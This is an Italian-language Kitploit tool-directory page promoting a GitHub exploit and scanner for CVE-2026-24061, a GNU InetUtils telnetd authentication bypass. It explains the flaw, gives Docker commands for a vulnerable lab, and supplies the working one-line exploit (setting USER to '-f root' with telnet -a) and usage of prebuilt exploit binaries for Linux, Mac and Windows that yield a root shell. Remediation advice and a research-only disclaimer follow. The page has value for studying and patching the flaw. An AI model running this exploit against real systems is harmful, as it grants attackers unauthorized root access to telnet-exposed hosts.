Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24061 — Exploit e scanner per CVE-2026-24061, un bypass dell'autenticazione di telnetd che concede una shell root tramite una variabile d'ambiente USER appositamente costruita. Include configurazione dell'ambiente Docker e binari exploit multipiattaforma. | Kitploit
Strumenti/GitHubGitHub/parad0x7e/cve-2026-24061
Analisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingAutenticazioneStrumento di Accesso Remoto
GitHubparad0x7e/cve-2026-24061

CVE-2026-24061

Exploit e scanner per CVE-2026-24061, un bypass dell'autenticazione di telnetd che concede una shell root tramite una variabile d'ambiente USER appositamente costruita. Include configurazione dell'ambiente Docker e binari exploit multipiattaforma.

Vedi Repository
87 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24061: Vulnerabilità di Bypass dell'Autenticazione in telnetd

CVE-2026-24061 è una vulnerabilità di bypass dell'autenticazione in telnetd che consente agli attaccanti di aggirare la verifica dell'identità tramite specifiche combinazioni di variabili d'ambiente e di ottenere direttamente una shell con privilegi di root.

C'è un difetto nella logica di autenticazione di telnetd. Quando si utilizza l'opzione -a (login automatico) combinata con una specifica variabile d'ambiente USER (come -f root), è possibile bypassare il normale processo di autenticazione e accedere direttamente come utente root.

Introduzione

GNU InetUtils è una raccolta di strumenti di rete di base sotto il progetto GNU. Contiene molti client e daemon di rete tradizionali, come ftp, telnet, rsh, rlogin, , ecc., fornendo una libreria completa di componenti di rete in stile GNU. è il programma server di questo toolkit responsabile della gestione delle richieste di connessione Telnet in arrivo, con il compito principale di fornire agli utenti remoti un'interfaccia terminale interattiva (di solito una Shell).

tftp
telnetd

Come Funziona

  1. Di solito è monitorato da inetd o xinetd sulla porta 23. Quando arriva una richiesta, viene avviato telnetd.
  2. Gestisce la negoziazione delle opzioni specifiche del protocollo Telnet (come tipo di terminale, dimensione della finestra, set di caratteri, ecc.).
  3. Di solito chiama il programma login di base del sistema per verificare nome utente e password.
  4. Dopo un login riuscito, alloca un pseudo-terminale all'utente e avvia la Shell specificata.

Riferimenti

  • https://github.com/yanxinwu946/CVE-2026-24061--telnetd
  • https://github.com/vulhub/vulhub/
  • https://forum.butian.net/share/4766

Configurazione dell'Ambiente

Prima di tutto, scarica questo repository localmente. La struttura delle directory è la seguente:

In questa directory, esegui il seguente comando per avviare l'ambiente vulnerabile per CVE-2026-24061:

root@kitploit:~
docker compose up -d --build

Dopo l'avvio, il servizio telnet sarà in esecuzione su 0.0.0.0:2323

Principio della Vulnerabilità

  1. L'opzione -a di telnetd viene utilizzata per abilitare la funzionalità di login automatico
  2. Quando -a è abilitato, telnetd legge la variabile d'ambiente USER come nome utente per il login
  3. Se la variabile d'ambiente USER è impostata su -f root, telnetd interpreta erroneamente -f come un flag di opzione e root come utente target
  4. Questo causa il bypass del controllo di autenticazione, stabilendo una sessione direttamente come utente root

Sfruttamento della Vulnerabilità

Sfruttamento Manuale

root@kitploit:~
# Imposta la variabile d'ambiente USER e connettiti con telnet -a
env USER='-f root' telnet -a 127.0.0.1 2323

Al successo, otterrai una shell interattiva con privilegi di root:

Sfruttamento Basato su Strumenti

root@kitploit:~
cd exp

Puoi vedere tre file: exp, exp_darwin e exp.exe sono file eseguibili rispettivamente per Linux, Mac e Windows. Scegli quello che ti serve. È fornito anche il codice sorgente dello strumento. Se hai bisogno di altre versioni, puoi compilarle da solo. Qui sto usando exp per Linux, che ha informazioni di aiuto dettagliate.

Rileva se la vulnerabilità esiste (per impostazione predefinita scansiona la porta 23):

root@kitploit:~
./exp -mode scan -target your-ip -port your-port

Sfrutta la vulnerabilità e ottieni una shell:

root@kitploit:~
./exp -mode exploit -target your-ip -port your-port

Come Correggere

  1. Aggiorna inetutils-telnetd all'ultima versione
  2. Disabilita il servizio telnet nell'ambiente di produzione e usa SSH al suo posto
  3. Distribuisci il servizio telnet in un ambiente di rete interna isolato
  4. Usa un firewall per limitare l'origine di accesso al servizio telnet

Disclaimer

Questo progetto è destinato esclusivamente alla ricerca sulla sicurezza e a scopi educativi. Non utilizzarlo su sistemi non autorizzati. Gli utenti si assumono ogni responsabilità legale per qualsiasi conseguenza derivante dall'uso di questo strumento.

Scarica lo strumento